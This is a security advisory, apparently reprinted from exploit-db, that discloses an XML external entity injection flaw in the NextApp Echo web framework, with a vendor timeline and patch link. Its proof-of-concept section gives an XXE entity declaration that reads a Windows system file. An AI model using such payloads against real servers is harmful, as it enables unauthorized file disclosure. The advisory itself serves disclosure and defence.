NextApp Echo < 2.1.1 XML Injection Vulnerability
2009-03-10T00:00:00
ID EDB-ID:8191 Type exploitdb Reporter SEC Consult Modified 2009-03-10T00:00:00
Description
NextApp Echo < 2.1.1 XML Injection Vulnerability. CVE-2009-5135. Remote exploits for multiple platform
SEC Consult Security Advisory < 20090305-0 >
========================================================================
title: NextApp Echo XML Injection Vulnerability
program: NextApp Echo
vulnerable version: Echo2 < 2.1.1
homepage: http://echo.nextapp.com/site/echo2
found: Feb. 2008
by: Anonymous / SEC Consult Vulnerability Lab
permanent link: http://www.sec-consult.com/files/20090305-0_echo_nextapp_xml_injection.txt
========================================================================
Vendor description:
-------------------
Echo is a platform for building web-based applications that approach the capabilities of rich clients. The applications
are developed using a component-oriented and event-driven API, eliminating the need to deal with the "page-based"
nature of browsers. To the developer, Echo works just like a user interface toolkit.
Vulnerability overview:
-----------------------
Unverified XML data is passed from the client (web browser) to the NextApp Echo engine and consequently
to an underlying XML parser. This leads to a typical XML injection scenario.
Vulnerability description:
--------------------------
All XML requests for the framework are created by JavaScript and then sent to the server via HTTP POST requests.
A typical request would look like the following:
---cut here---
<client-message xmlns="http://www.nextapp.com/products/echo2/climsg" trans-id="3" focus="c_25"><message-part xmlns="" processor="EchoPropertyUpdate"><property component-id="c_25" name="text">aa</property><property component-id="c_25" name="horizontalScroll" value="0"/><property component-id="c_25" name="verticalScroll" value="0"/></message-part><message-part xmlns="" processor="EchoAction"><action component-id="c_25" name="action"/></message-part></client-message>
---cut here---
By manipulating the POST content it is possible to inject arbitrary XML declarations and tags.
Proof of concept:
-----------------
The following entity declaration would create a new XML entity with the content of the boot.ini file which
can be referenced in the following XML request content:
---cut here---
<?xml version="1.0"?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot.ini">]>
---cut here---
Vulnerable versions:
--------------------
NextApp Echo v2.1.0.rc2
Vendor contact timeline:
------------------------
2009/02/16: Vendor notified via email
2009/02/24: Patch available
Patch/Workaround:
-----------------
The vendor has released an update which addresses the vulnerability. The update can be downloaded at:
http://echo.nextapp.com/site/node/5742
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
# EOF SEC Consult Vulnerability Lab / @2009
# milw0rm.com [2009-03-10]
References
Source: https://www.exploit-db.com/exploits/8191/
OSVDB: 52889
CVE-2009-5135 (NVD, published 2013-05-02, modified 2018-10-10): The Java XML parser in Echo before 2.1.1 and 3.x before 3.0.b6 allows remote attackers to read arbitrary files via a request containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
CWE: CWE-20
CVSS v2: 5.0 (MEDIUM), AV:N/AC:L/Au:N/C:P/I:N/A:N